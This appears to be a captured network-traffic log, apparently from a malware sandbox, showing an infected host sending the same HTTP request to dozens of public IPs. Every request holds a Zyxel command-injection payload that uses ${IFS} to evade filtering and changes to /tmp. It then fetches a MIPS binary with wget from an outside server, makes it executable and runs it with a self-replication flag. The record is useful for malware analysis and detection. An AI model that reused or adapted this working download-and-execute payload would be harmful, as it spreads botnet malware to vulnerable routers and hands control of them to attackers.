                                        Jan 14, 2024 16:18:51.611809969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6083192.168.2.1332774104.57.118.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611825943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6084192.168.2.1346572216.95.47.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611855030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6085192.168.2.134530042.249.40.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611897945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6086192.168.2.1348042133.190.24.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611932039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6087192.168.2.1336330180.114.195.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611993074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6088192.168.2.1333948169.115.94.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612015009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6089192.168.2.1357640178.103.64.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612076998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6090192.168.2.1355992115.144.117.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612124920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6091192.168.2.13531525.213.82.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612174988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6092192.168.2.134781254.163.135.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612181902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6093192.168.2.133741693.219.228.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612238884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6094192.168.2.134467699.189.85.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612268925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6095192.168.2.135121288.228.219.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612313032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6096192.168.2.1344784178.134.240.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612350941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6097192.168.2.1338562212.107.13.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612381935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6098192.168.2.1338874163.179.89.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612431049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6099192.168.2.133496870.178.2.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612449884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6100192.168.2.1340132135.149.251.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612490892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6101192.168.2.134061299.211.4.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612534046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6102192.168.2.135657214.15.77.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612570047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6103192.168.2.1334210167.233.219.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612617970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6104192.168.2.1351730109.100.87.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612670898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6105192.168.2.135499834.223.235.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612692118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6106192.168.2.1356856160.252.221.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612735033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6107192.168.2.1345990111.3.181.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612775087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6108192.168.2.1359054105.147.68.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612791061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6109192.168.2.135976227.207.205.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612848997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6110192.168.2.1334252179.24.172.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612869024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6111192.168.2.136099432.214.182.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.612977982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6112192.168.2.1336412131.226.194.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613017082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6113192.168.2.1334580101.146.159.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613053083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6114192.168.2.1351188207.96.96.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613080025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6115192.168.2.1347758216.239.123.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613152027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6116192.168.2.133750434.230.168.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613183022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6117192.168.2.1353464222.91.51.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613219023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6118192.168.2.1338536104.215.99.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613254070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6119192.168.2.1352466191.108.48.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613265038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6120192.168.2.1345614158.28.218.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613312960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6121192.168.2.1347810161.176.79.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613343000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6122192.168.2.134558850.228.101.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613405943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6123192.168.2.1348794109.159.68.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613434076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6124192.168.2.1340806111.199.95.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613488913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6125192.168.2.134073895.31.53.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613524914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6126192.168.2.135062475.72.175.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613563061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6127192.168.2.1333390149.35.41.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613625050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6128192.168.2.134638434.71.111.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613662958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6129192.168.2.134920613.124.142.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613708019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6130192.168.2.1335424156.227.229.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613758087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6131192.168.2.1347430131.99.194.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613807917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6132192.168.2.134828490.220.230.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613840103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6133192.168.2.133630850.28.138.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613873005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6134192.168.2.1333354222.117.56.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613909960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6135192.168.2.136033241.145.57.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613930941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6136192.168.2.133561084.215.55.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.613986015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6137192.168.2.135288038.106.158.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614008904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6138192.168.2.133999068.34.5.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614062071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6139192.168.2.133313894.239.51.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614094019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6140192.168.2.1333030154.132.53.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614145994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6141192.168.2.134161234.28.241.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614196062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6142192.168.2.13462628.206.34.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614229918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6143192.168.2.135027441.154.140.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614263058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6144192.168.2.1335962170.70.115.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.614298105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6145192.168.2.1360902192.28.158.87443
                                        TimestampBytes transferredDirectionData
